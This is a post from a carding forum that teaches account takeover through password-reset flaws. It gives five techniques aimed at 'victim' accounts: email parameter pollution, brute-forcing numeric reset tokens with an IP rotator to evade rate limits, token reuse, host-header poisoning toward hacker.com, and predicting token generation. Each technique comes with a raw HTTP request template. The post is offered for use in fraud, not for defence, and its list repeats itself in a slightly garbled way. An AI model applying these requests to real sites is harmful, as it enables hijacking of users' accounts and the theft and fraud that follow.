Carding 4 Carders
Professional
- Messages
- 2,724
- Reaction score
- 1,586
- Points
- 113
There are several ways that can help you reset the password of any user on the site to hijack his account:
1. Include your mail as the second parameter (this way you can get the reset link):
2. Brute force the reset token, if it is numeric. You can use Burpsuite's IP Rotator to bypass the rate limit in case it is IP based:
3. Try using your reset token for the victim's account:
4. Implementation of the host header; change website.com to hacker.com (victim may receive a reset link from your host instead of the original site):
5. Try to figure out how tokens are generated. As an example, they can be:
- created based on a timestamp (date, current time, etc.)
- created based on user ID
- created based on the user's email
1. Include your mail as the second parameter (this way you can get the reset link):
Code:
POST / resetPassword
[...]
email = victim @ tld.xyz & email = hacker @ tld.xyz2. Brute force the reset token, if it is numeric. You can use Burpsuite's IP Rotator to bypass the rate limit in case it is IP based:
Code:
POST / resetPassword
[...]
email=victim@tld.xyz&code=$BRUTE$3. Try using your reset token for the victim's account:
Code:
POST / resetPassword
[...]
email=victim@tld.xyz&code=$YOUR-TOKEN$4. Implementation of the host header; change website.com to hacker.com (victim may receive a reset link from your host instead of the original site):
Code:
POST / resetPassword
Host: hacker.com
[...]5. Try to figure out how tokens are generated. As an example, they can be:
- created based on a timestamp (date, current time, etc.)
- created based on user ID
- created based on the user's email
